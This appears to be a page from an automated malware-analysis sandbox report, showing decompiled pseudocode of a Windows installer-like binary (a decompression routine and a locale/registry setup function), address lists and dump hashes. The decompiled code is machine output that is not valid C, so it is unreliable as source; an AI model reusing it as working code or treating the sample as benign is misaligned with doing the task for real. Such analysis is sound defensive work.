							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xc;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t334 = __ebp - 0x70;
							 *_t334 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t334;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							__eax =  *(__ebp - 0x2c);
							goto L101;
						case 0xd:
							goto L36;
						case 0xe:
							goto L45;
						case 0xf:
							goto L57;
						case 0x10:
							L109:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x10;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t365 = __ebp - 0x70;
							 *_t365 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t365;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							goto L111;
						case 0x11:
							L68:
							__esi =  *(__ebp - 0x58);
							 *(__ebp - 0x84) = 0x12;
							goto L132;
						case 0x12:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 0x58);
								 *(__ebp - 0x84) = 0x13;
								__esi =  *(__ebp - 0x58) + 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x4c);
							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							__eflags = __eax;
							__eax =  *(__ebp - 0x58) + __eax + 4;
							goto L130;
						case 0x13:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								_t469 = __ebp - 0x58;
								 *_t469 =  *(__ebp - 0x58) + 0x204;
								__eflags =  *_t469;
								 *(__ebp - 0x30) = 0x10;
								 *(__ebp - 0x40) = 8;
								L144:
								 *(__ebp - 0x7c) = 0x14;
								goto L145;
							}
							__eax =  *(__ebp - 0x4c);
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							 *(__ebp - 0x30) = 8;
							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
							L130:
							 *(__ebp - 0x58) = __eax;
							 *(__ebp - 0x40) = 3;
							goto L144;
						case 0x14:
							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
							__eax =  *(__ebp - 0x80);
							goto L140;
						case 0x15:
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
							goto L120;
						case 0x16:
							__eax =  *(__ebp - 0x30);
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx =  *(__ebp - 4);
							 *(__ebp - 0x40) = 6;
							__eax = __eax << 7;
							 *(__ebp - 0x7c) = 0x19;
							 *(__ebp - 0x58) = __eax;
							goto L145;
						case 0x17:
							L145:
							__eax =  *(__ebp - 0x40);
							 *(__ebp - 0x50) = 1;
							 *(__ebp - 0x48) =  *(__ebp - 0x40);
							goto L149;
						case 0x18:
							L146:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x18;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t484 = __ebp - 0x70;
							 *_t484 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t484;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L148:
							_t487 = __ebp - 0x48;
							 *_t487 =  *(__ebp - 0x48) - 1;
							__eflags =  *_t487;
							L149:
							__eflags =  *(__ebp - 0x48);
							if( *(__ebp - 0x48) <= 0) {
								__ecx =  *(__ebp - 0x40);
								__ebx =  *(__ebp - 0x50);
								0 = 1;
								__eax = 1 << __cl;
								__ebx =  *(__ebp - 0x50) - (1 << __cl);
								__eax =  *(__ebp - 0x7c);
								 *(__ebp - 0x44) = __ebx;
								goto L140;
							}
							__eax =  *(__ebp - 0x50);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
							__eax =  *(__ebp - 0x58);
							__esi = __edx + __eax;
							 *(__ebp - 0x54) = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								 *(__ebp - 0x50) = __edx;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L148;
							} else {
								goto L146;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								 *(__ebp - 0x2c) = __ebx;
								L119:
								_t393 = __ebp - 0x2c;
								 *_t393 =  *(__ebp - 0x2c) + 1;
								__eflags =  *_t393;
								L120:
								__eax =  *(__ebp - 0x2c);
								__eflags = __eax;
								if(__eax == 0) {
									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
									goto L170;
								}
								__eflags = __eax -  *(__ebp - 0x60);
								if(__eax >  *(__ebp - 0x60)) {
									goto L171;
								}
								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
								__eax =  *(__ebp - 0x30);
								_t400 = __ebp - 0x60;
								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
								__eflags =  *_t400;
								goto L123;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							 *(__ebp - 0x2c) = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								 *(__ebp - 0x48) = __ecx;
								L102:
								__eflags =  *(__ebp - 0x48);
								if( *(__ebp - 0x48) <= 0) {
									__eax = __eax + __ebx;
									 *(__ebp - 0x40) = 4;
									 *(__ebp - 0x2c) = __eax;
									__eax =  *(__ebp - 4);
									__eax =  *(__ebp - 4) + 0x644;
									__eflags = __eax;
									L108:
									__ebx = 0;
									 *(__ebp - 0x58) = __eax;
									 *(__ebp - 0x50) = 1;
									 *(__ebp - 0x44) = 0;
									 *(__ebp - 0x48) = 0;
									L112:
									__eax =  *(__ebp - 0x40);
									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
										_t391 = __ebp - 0x2c;
										 *_t391 =  *(__ebp - 0x2c) + __ebx;
										__eflags =  *_t391;
										goto L119;
									}
									__eax =  *(__ebp - 0x50);
									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
									__eax =  *(__ebp - 0x58);
									__esi = __edi + __eax;
									 *(__ebp - 0x54) = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
									__eflags =  *(__ebp - 0xc) - __edx;
									if( *(__ebp - 0xc) >= __edx) {
										__ecx = 0;
										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
										__ecx = 1;
										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
										__ebx = 1;
										__ecx =  *(__ebp - 0x48);
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx =  *(__ebp - 0x44);
										__ebx =  *(__ebp - 0x44) | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										 *(__ebp - 0x44) = __ebx;
										 *__esi = __ax;
										 *(__ebp - 0x50) = __edi;
									} else {
										 *(__ebp - 0x10) = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
										 *__esi = __dx;
									}
									__eflags =  *(__ebp - 0x10) - 0x1000000;
									if( *(__ebp - 0x10) >= 0x1000000) {
										L111:
										_t368 = __ebp - 0x48;
										 *_t368 =  *(__ebp - 0x48) + 1;
										__eflags =  *_t368;
										goto L112;
									} else {
										goto L109;
									}
								}
								__ecx =  *(__ebp - 0xc);
								__ebx = __ebx + __ebx;
								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
									__ecx =  *(__ebp - 0x10);
									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									 *(__ebp - 0x44) = __ebx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								if( *(__ebp - 0x10) >= 0x1000000) {
									L101:
									_t338 = __ebp - 0x48;
									 *_t338 =  *(__ebp - 0x48) - 1;
									__eflags =  *_t338;
									goto L102;
								} else {
									goto L99;
								}
							}
							__edx =  *(__ebp - 4);
							__eax = __eax - __ebx;
							 *(__ebp - 0x40) = __ecx;
							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
							goto L108;
						case 0x1a:
							goto L55;
						case 0x1b:
							L75:
							__eflags =  *(__ebp - 0x64);
							if( *(__ebp - 0x64) == 0) {
								 *(__ebp - 0x88) = 0x1b;
								goto L170;
							}
							__eax =  *(__ebp - 0x14);
							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
							__eflags = __eax -  *(__ebp - 0x74);
							if(__eax >=  *(__ebp - 0x74)) {
								__eax = __eax +  *(__ebp - 0x74);
								__eflags = __eax;
							}
							__edx =  *(__ebp - 8);
							__cl =  *(__eax + __edx);
							__eax =  *(__ebp - 0x14);
							 *(__ebp - 0x5c) = __cl;
							 *(__eax + __edx) = __cl;
							__eax = __eax + 1;
							__edx = 0;
							_t274 = __eax %  *(__ebp - 0x74);
							__eax = __eax /  *(__ebp - 0x74);
							__edx = _t274;
							__eax =  *(__ebp - 0x68);
							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
							_t283 = __ebp - 0x64;
							 *_t283 =  *(__ebp - 0x64) - 1;
							__eflags =  *_t283;
							 *( *(__ebp - 0x68)) = __cl;
							goto L79;
						case 0x1c:
							while(1) {
								L123:
								__eflags =  *(__ebp - 0x64);
								if( *(__ebp - 0x64) == 0) {
									break;
								}
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__edx =  *(__ebp - 8);
								__cl =  *(__eax + __edx);
								__eax =  *(__ebp - 0x14);
								 *(__ebp - 0x5c) = __cl;
								 *(__eax + __edx) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t414 = __eax %  *(__ebp - 0x74);
								__eax = __eax /  *(__ebp - 0x74);
								__edx = _t414;
								__eax =  *(__ebp - 0x68);
								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
								__eflags =  *(__ebp - 0x30);
								 *( *(__ebp - 0x68)) = __cl;
								 *(__ebp - 0x14) = __edx;
								if( *(__ebp - 0x30) > 0) {
									continue;
								} else {
									goto L80;
								}
							}
							 *(__ebp - 0x88) = 0x1c;
							goto L170;
					}
				}
			}

0x00000000
0x00406925
0x00406925
0x0040692a
0x004069a1
0x004069a8
0x004069b2
0x00406f91
0x00406f91
0x00406f94
0x00406f94
0x00406f9a
0x00406fa0
0x00406fa6
0x00406fc0
0x00406fc3
0x00406fc9
0x00406fd4
0x00406fd6
0x00406fa8
0x00406fa8
0x00406fb7
0x00406fbb
0x00406fbb
0x00406fe0
0x00407007
0x00407007
0x0040700d
0x0040700d
0x00000000
0x00406fe2
0x00406fe2
0x00406fe6
0x00407195
0x00000000
0x00407195
0x00406ff2
0x00406ff9
0x00407001
0x00407004
0x00000000
0x00407004
0x0040692c
0x0040692c
0x00406930
0x00406938
0x0040693b
0x0040693d
0x00406940
0x00406942
0x00406947
0x0040694a
0x00406951
0x00406958
0x0040695b
0x00406966
0x0040696e
0x0040696e
0x00406968
0x00406968
0x00406968
0x0040695d
0x0040695d
0x0040695d
0x00406975
0x00406993
0x00406995
0x00406b68
0x00406b68
0x00406b6b
0x00406b6e
0x00406b71
0x00406b74
0x00406b77
0x00406b7a
0x00406b7d
0x00406b80
0x00406b86
0x00406b9e
0x00406ba1
0x00406ba4
0x00406ba7
0x00406ba7
0x00406baa
0x00406bb0
0x00406b88
0x00406b88
0x00406b90
0x00406b95
0x00406b97
0x00406b99
0x00406b99
0x00406bba
0x00406bbd
0x00406b60
0x00406b66
0x00000000
0x00000000
0x00000000
0x00406bbf
0x00406b3b
0x00406b3f
0x00407147
0x00000000
0x00407147
0x00406b45
0x00406b48
0x00406b4b
0x00406b4f
0x00406b52
0x00406b58
0x00406b5a
0x00406b5a
0x00406b5d
0x00000000
0x00406b5d
0x00406977
0x00406977
0x0040697a
0x00406980
0x00406982
0x00406982
0x00406985
0x00406988
0x0040698a
0x0040698b
0x0040698e
0x004069fb
0x004069fb
0x004069ff
0x00406a02
0x00406a05
0x00406a08
0x00406a0b
0x00406a0c
0x00406a0f
0x00406a11
0x00406a17
0x00406a1a
0x00406a1d
0x00406a20
0x00406a23
0x00406a29
0x00406a45
0x00406a48
0x00406a4b
0x00406a4e
0x00406a55
0x00406a5b
0x00406a5f
0x00406a2b
0x00406a2b
0x00406a2f
0x00406a37
0x00406a3c
0x00406a3e
0x00406a40
0x00406a40
0x00406a69
0x00406a6c
0x004069e3
0x004069e3
0x004069e9
0x00406a9c
0x00406aa2
0x00000000
0x00000000
0x00406aa4
0x00406aa7
0x00406aaa
0x00406aad
0x00406ab0
0x00406ab3
0x00406ab6
0x00406ab9
0x00406abc
0x00406ac2
0x00406ada
0x00406add
0x00406ae0
0x00406ae3
0x00406ae3
0x00406ae6
0x00406aec
0x00406ac4
0x00406ac4
0x00406acc
0x00406ad1
0x00406ad3
0x00406ad5
0x00406ad5
0x00406af6
0x00406af9
0x00406a77
0x00406a7b
0x0040713b
0x00000000
0x0040713b
0x00406a81
0x00406a84
0x00406a87
0x00406a8b
0x00406a8e
0x00406a94
0x00406a96
0x00406a96
0x00406a99
0x00406a99
0x00406af9
0x00406b00
0x00406b00
0x00406b00
0x00406b04
0x00406b04
0x00406b07
0x00406b0a
0x00406b0e
0x00407153
0x00000000
0x00407153
0x00406b14
0x00406b17
0x00406b1a
0x00406b1d
0x00406b20
0x00406b23
0x00406b26
0x00406b28
0x00406b2b
0x00406b2e
0x00406b31
0x00406b33
0x00406b33
0x00406b33
0x00406cd0
0x00406cd0
0x00406cd3
0x00406cd3
0x00000000
0x00406cd3
0x004069f5
0x00000000
0x00000000
0x00000000
0x00406a72
0x004069be
0x004069c2
0x0040712f
0x004071ab
0x004071b3
0x004071ba
0x004071bc
0x004071c3
0x004071c7
0x004071c7
0x004069c8
0x004069cb
0x004069ce
0x004069d2
0x004069d5
0x004069db
0x004069dd
0x004069dd
0x004069e0
0x00000000
0x004069e0
0x00406a6c
0x00406975
0x004067a9
0x004067a9
0x004067b2
0x004071c0
0x004071c0
0x00000000
0x004071c0
0x004067b8
0x00000000
0x004067c3
0x00000000
0x00000000
0x004067cc
0x004067cf
0x004067d2
0x004067d6
0x00000000
0x00000000
0x004067dc
0x004067df
0x004067e1
0x004067e2
0x004067e5
0x004067e7
0x004067e8
0x004067ea
0x004067ed
0x004067f2
0x004067f7
0x00406800
0x00406813
0x00406816
0x00406822
0x0040684a
0x0040684c
0x0040685a
0x0040685a
0x0040685e
0x00000000
0x00000000
0x00000000
0x00000000
0x0040684e
0x0040684e
0x00406851
0x00406852
0x00406852
0x00000000
0x0040684e
0x00406828
0x0040682d
0x0040682d
0x00406836
0x0040683e
0x00406841
0x00000000
0x00406847
0x00406847
0x00000000
0x00406847
0x00000000
0x00406864
0x00406864
0x00406868
0x00407114
0x00000000
0x00407114
0x00406871
0x00406881
0x00406884
0x00406887
0x00406887
0x00406887
0x0040688a
0x0040688e
0x00000000
0x00000000
0x00406890
0x00406896
0x004068c0
0x004068c6
0x004068cd
0x00000000
0x004068cd
0x0040689c
0x0040689f
0x004068a4
0x004068a4
0x004068af
0x004068b7
0x004068ba
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004068ff
0x00406905
0x00406908
0x00406915
0x0040691d
0x00000000
0x00000000
0x004068d4
0x004068d4
0x004068d8
0x00407123
0x00000000
0x00407123
0x004068e4
0x004068ef
0x004068ef
0x004068ef
0x004068f2
0x004068f5
0x004068f8
0x004068fd
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406bc4
0x00406bc8
0x00406be6
0x00406be9
0x00406bf0
0x00406bf3
0x00406bf6
0x00406bf9
0x00406bfc
0x00406bff
0x00406c01
0x00406c08
0x00406c09
0x00406c0b
0x00406c0e
0x00406c11
0x00406c14
0x00406c14
0x00406c19
0x00000000
0x00406c19
0x00406bca
0x00406bcd
0x00406bd0
0x00406bda
0x00000000
0x00000000
0x00406c2e
0x00406c32
0x00406c55
0x00406c58
0x00406c5b
0x00406c65
0x00406c34
0x00406c34
0x00406c37
0x00406c3a
0x00406c3d
0x00406c4a
0x00406c4d
0x00406c4d
0x00000000
0x00000000
0x00406c71
0x00406c75
0x00000000
0x00000000
0x00406c7b
0x00406c7f
0x00000000
0x00000000
0x00406c85
0x00406c87
0x00406c8b
0x00406c8b
0x00406c8e
0x00406c92
0x00000000
0x00000000
0x00406ce2
0x00406ce6
0x00406ced
0x00406cf0
0x00406cf3
0x00406cfd
0x00000000
0x00406cfd
0x00406ce8
0x00000000
0x00000000
0x00406d09
0x00406d0d
0x00406d14
0x00406d17
0x00406d1a
0x00406d0f
0x00406d0f
0x00406d0f
0x00406d1d
0x00406d20
0x00406d23
0x00406d23
0x00406d26
0x00406d29
0x00406d2c
0x00406d2c
0x00406d2f
0x00406d36
0x00406d3b
0x00000000
0x00000000
0x00406dc9
0x00406dc9
0x00406dcd
0x0040716b
0x00000000
0x0040716b
0x00406dd3
0x00406dd6
0x00406dd9
0x00406ddd
0x00406de0
0x00406de6
0x00406de8
0x00406de8
0x00406de8
0x00406deb
0x00406dee
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406e4c
0x00406e4c
0x00406e50
0x00407177
0x00000000
0x00407177
0x00406e56
0x00406e59
0x00406e5c
0x00406e60
0x00406e63
0x00406e69
0x00406e6b
0x00406e6b
0x00406e6b
0x00406e6e
0x00000000
0x00000000
0x00406c1c
0x00406c1c
0x00406c1f
0x00000000
0x00000000
0x00406f5b
0x00406f5f
0x00406f81
0x00406f84
0x00406f8e
0x00000000
0x00406f8e
0x00406f61
0x00406f64
0x00406f68
0x00406f6b
0x00406f6b
0x00406f6e
0x00000000
0x00000000
0x00407018
0x0040701c
0x0040703a
0x0040703a
0x0040703a
0x00407041
0x00407048
0x0040704f
0x0040704f
0x00000000
0x0040704f
0x0040701e
0x00407021
0x00407024
0x00407027
0x0040702e
0x00406f72
0x00406f72
0x00406f75
0x00000000
0x00000000
0x00407109
0x0040710c
0x00000000
0x00000000
0x00406d43
0x00406d45
0x00406d4c
0x00406d4d
0x00406d4f
0x00406d52
0x00000000
0x00000000
0x00406d5a
0x00406d5d
0x00406d60
0x00406d62
0x00406d64
0x00406d64
0x00406d65
0x00406d68
0x00406d6f
0x00406d72
0x00406d80
0x00000000
0x00000000
0x00407056
0x00407056
0x00407059
0x00407060
0x00000000
0x00000000
0x00407065
0x00407065
0x00407069
0x004071a1
0x00000000
0x004071a1
0x0040706f
0x00407072
0x00407075
0x00407079
0x0040707c
0x00407082
0x00407084
0x00407084
0x00407084
0x00407087
0x0040708a
0x0040708a
0x0040708a
0x0040708a
0x0040708d
0x0040708d
0x00407091
0x004070f1
0x004070f4
0x004070f9
0x004070fa
0x004070fc
0x004070fe
0x00407101
0x00000000
0x00407101
0x00407093
0x00407099
0x0040709c
0x0040709f
0x004070a2
0x004070a5
0x004070a8
0x004070ab
0x004070ae
0x004070b1
0x004070b4
0x004070cd
0x004070d0
0x004070d3
0x004070d6
0x004070da
0x004070dc
0x004070dc
0x004070dd
0x004070e0
0x004070b6
0x004070b6
0x004070be
0x004070c3
0x004070c5
0x004070c8
0x004070c8
0x004070e3
0x004070ea
0x00000000
0x004070ec
0x00000000
0x004070ec
0x00000000
0x00406d88
0x00406d8b
0x00406dc1
0x00406ef1
0x00406ef1
0x00406ef1
0x00406ef1
0x00406ef4
0x00406ef4
0x00406ef7
0x00406ef9
0x00407183
0x00000000
0x00407183
0x00406eff
0x00406f02
0x00000000
0x00000000
0x00406f08
0x00406f0c
0x00406f0f
0x00406f0f
0x00406f0f
0x00000000
0x00406f0f
0x00406d8d
0x00406d8f
0x00406d91
0x00406d93
0x00406d96
0x00406d97
0x00406d99
0x00406d9b
0x00406d9e
0x00406da1
0x00406db7
0x00406dbc
0x00406df4
0x00406df4
0x00406df8
0x00406e24
0x00406e26
0x00406e2d
0x00406e30
0x00406e33
0x00406e33
0x00406e38
0x00406e38
0x00406e3a
0x00406e3d
0x00406e44
0x00406e47
0x00406e74
0x00406e74
0x00406e77
0x00406e7a
0x00406eee
0x00406eee
0x00406eee
0x00000000
0x00406eee
0x00406e7c
0x00406e82
0x00406e85
0x00406e88
0x00406e8b
0x00406e8e
0x00406e91
0x00406e94
0x00406e97
0x00406e9a
0x00406e9d
0x00406eb6
0x00406eb8
0x00406ebb
0x00406ebc
0x00406ebf
0x00406ec1
0x00406ec4
0x00406ec6
0x00406ec8
0x00406ecb
0x00406ecd
0x00406ed0
0x00406ed4
0x00406ed6
0x00406ed6
0x00406ed7
0x00406eda
0x00406edd
0x00406e9f
0x00406e9f
0x00406ea7
0x00406eac
0x00406eae
0x00406eb1
0x00406eb1
0x00406ee0
0x00406ee7
0x00406e71
0x00406e71
0x00406e71
0x00406e71
0x00000000
0x00406ee9
0x00000000
0x00406ee9
0x00406ee7
0x00406dfa
0x00406dfd
0x00406dff
0x00406e02
0x00406e05
0x00406e08
0x00406e0a
0x00406e0d
0x00406e10
0x00406e10
0x00406e13
0x00406e13
0x00406e16
0x00406e1d
0x00406df1
0x00406df1
0x00406df1
0x00406df1
0x00000000
0x00406e1f
0x00000000
0x00406e1f
0x00406e1d
0x00406da3
0x00406da6
0x00406da8
0x00406dab
0x00000000
0x00000000
0x00000000
0x00000000
0x00406c95
0x00406c95
0x00406c99
0x0040715f
0x00000000
0x0040715f
0x00406c9f
0x00406ca2
0x00406ca5
0x00406ca8
0x00406caa
0x00406caa
0x00406caa
0x00406cad
0x00406cb0
0x00406cb3
0x00406cb6
0x00406cb9
0x00406cbc
0x00406cbd
0x00406cbf
0x00406cbf
0x00406cbf
0x00406cc2
0x00406cc5
0x00406cc8
0x00406ccb
0x00406ccb
0x00406ccb
0x00406cce
0x00000000
0x00000000
0x00406f12
0x00406f12
0x00406f12
0x00406f16
0x00000000
0x00000000
0x00406f1c
0x00406f1f
0x00406f22
0x00406f25
0x00406f27
0x00406f27
0x00406f27
0x00406f2a
0x00406f2d
0x00406f30
0x00406f33
0x00406f36
0x00406f39
0x00406f3a
0x00406f3c
0x00406f3c
0x00406f3c
0x00406f3f
0x00406f42
0x00406f45
0x00406f48
0x00406f4b
0x00406f4f
0x00406f51
0x00406f54
0x00000000
0x00406f56
0x00000000
0x00406f56
0x00406f54
0x00407189
0x00000000
0x00000000
0x004067b8

Memory Dump Source

Source File: 00000000.00000002.215331013.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.215317063.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.215358332.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.215380334.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.215435164.0000000000423000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.215456992.000000000042A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.215487419.000000000042D000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 69107d409a21aceab355f2bdda7f7152adad7d75b4471f7616c4440fbc630a2e
Instruction ID: 6d311f2402807b87ac493386ce59d8e56409eb9bb3693b5a24021ea98ba03221
Opcode Fuzzy Hash: 69107d409a21aceab355f2bdda7f7152adad7d75b4471f7616c4440fbc630a2e
Instruction Fuzzy Hash: 3AF18571D04229CBDF28CFA8C8946ADBBB1FF44305F25816ED456BB281D3786A86CF45

Uniqueness

Uniqueness Score: -1.00%

Function 00403A3B, Relevance: 51.0, APIs: 14, Strings: 15, Instructions: 215
stringregistryCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E00403A3B(void* __eflags) {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				void _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t17;
				void* _t25;
				void* _t27;
				int _t28;
				void* _t31;
				int _t34;
				int _t35;
				intOrPtr _t36;
				int _t39;
				char _t57;
				CHAR* _t59;
				signed char _t63;
				signed short _t67;
				CHAR* _t74;
				intOrPtr _t76;
				CHAR* _t81;

				_t76 =  *0x424754;
				_t17 = E00406631(2);
				_t84 = _t17;
				if(_t17 == 0) {
					_t74 = 0x420d50;
					"1033" = 0x30;
					 *0x42b001 = 0x78;
					 *0x42b002 = 0;
					E0040610F(_t71, __eflags, 0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x420d50, 0);
					__eflags =  *0x420d50;
					if(__eflags == 0) {
						E0040610F(_t71, __eflags, 0x80000003, ".DEFAULT\\Control Panel\\International",  &M0040836A, 0x420d50, 0);
					}
					lstrcatA("1033", _t74);
				} else {
					_t67 =  *_t17(); // executed
					E00406186("1033", _t67 & 0x0000ffff);
				}
				E00403D00(_t71, _t84);
				_t80 = "C:\\Users\\hardz\\AppData\\Local\\Temp";
				 *0x4247e0 =  *0x42475c & 0x00000020;
				 *0x4247fc = 0x10000;
				if(E00405CAE(_t84, "C:\\Users\\hardz\\AppData\\Local\\Temp") != 0) {
					L16:
					if(E00405CAE(_t92, _t80) == 0) {
						E004062BB(0, _t74, _t76, _t80,  *((intOrPtr*)(_t76 + 0x118)));
					}
					_t25 = LoadImageA( *0x424740, 0x67, 1, 0, 0, 0x8040);
					 *0x423f28 = _t25;
					if( *((intOrPtr*)(_t76 + 0x50)) == 0xffffffff) {
						L21:
						if(E0040140B(0) == 0) {
							_t27 = E00403D00(_t71, __eflags);
							__eflags =  *0x424800;
							if( *0x424800 != 0) {
								_t28 = E00405421(_t27, 0);
								__eflags = _t28;
								if(_t28 == 0) {
									E0040140B(1);
									goto L33;
								}
								__eflags =  *0x423f0c; // 0x0
								if(__eflags == 0) {
									E0040140B(2);
								}
								goto L22;
							}
							ShowWindow( *0x420d30, 5);
							_t34 = E004065C3("RichEd20");
							__eflags = _t34;
							if(_t34 == 0) {
								E004065C3("RichEd32");
							}
							_t81 = "RichEdit20A";
							_t35 = GetClassInfoA(0, _t81, 0x423ee0);
							__eflags = _t35;
							if(_t35 == 0) {
								GetClassInfoA(0, "RichEdit", 0x423ee0);
								 *0x423f04 = _t81;
								RegisterClassA(0x423ee0);
							}
